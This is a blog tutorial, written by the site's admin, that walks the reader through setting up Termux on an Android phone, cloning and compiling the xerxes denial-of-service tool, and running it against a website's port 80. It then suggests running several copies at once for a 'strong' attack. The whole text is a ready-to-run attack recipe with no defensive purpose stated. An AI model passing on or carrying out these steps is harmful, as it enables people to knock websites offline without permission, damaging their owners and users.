How to perform DDoS attack in mobile using xerxes via termux
Hy friends,
Welcome back to my blog again. I am Chucky Riley Carter the admin of this blog. Today i am going to tell you that how you can perform DDoS attack in mobile using xerxes via termux app. For this we will use termux which is a terminal emulator and also the small version of linux.
What Is Termux :
From the website of termux, it is a terminal emulator and also the small version of linux, which is compatible for smartphones.
With termux you can run a small linux environment on your android device.
Basic Needs :
1 – You must have an android device which have android version of 5.0 (lollipop ) or above.
2 – Termux app ( you can easily find this from play store by just typing termux )
3 – Hacker\’s keyboard ( it is also available in play store )
4 – And the most necessary thing is patience and brain.
5 – Don\’t do spelling mistakes
How To Install :
1 – To install termux in your android device , first turn on your mobile data and go to play store. Search termux and download it from there.
2 – Now open the termux app and update it by typing the below command.
[ pkg update ]
3 – Now upgrade it by typing the below command.
[ pkg upgrade ]
4 – To ru xerxes in termux we need the git package and clang package.
5 – To install the git package type the below command.
[ pkg install git ]
6 – Now we will install clang package. To install clang package type and run the below command
[ pkg install clang ]
7 – after installing the above two packages now clone the github file of xerxes to install xerxes in termux. To clone the github file of xerxes run the below command.
[ git clone https://github.com/zanyarjamal/xerxes.git ]
8 – After some time it will be cloned to termux. After successfully installing xerxes type the below command to see the all file list.
[ ls ]
9 – Now type the below command to go to the current directory of xerxes.
[ cd xerxes ]
10 – After going to the current directory of xerxes type and run the below command to see the all lists of xerxes.
[ ls ]
11 – Now type and run below command to decompile the xerxes.c file
[ clang xerxes.c -o xerxes ]
12 – Thats all the xerxes package is now ready to use.
How To Run :
1 – To run the xerxes file in termux now type the below command to perform the DDoS attack .
[ ./xerxes http://www.website.com 80 ]
2 – To perform a strong DDoS attack ,open multiple terminals and run the above command multiple times.
Precaution :
1 – During the whole process of installing xerxes in termux make sure that you are connected to the internet.
2 – Don\’t do spelling mistakes , Otherwise your command won\’t run properly.
3 – Stay calm and composed so that you can solve all the problems you are facing in termux.
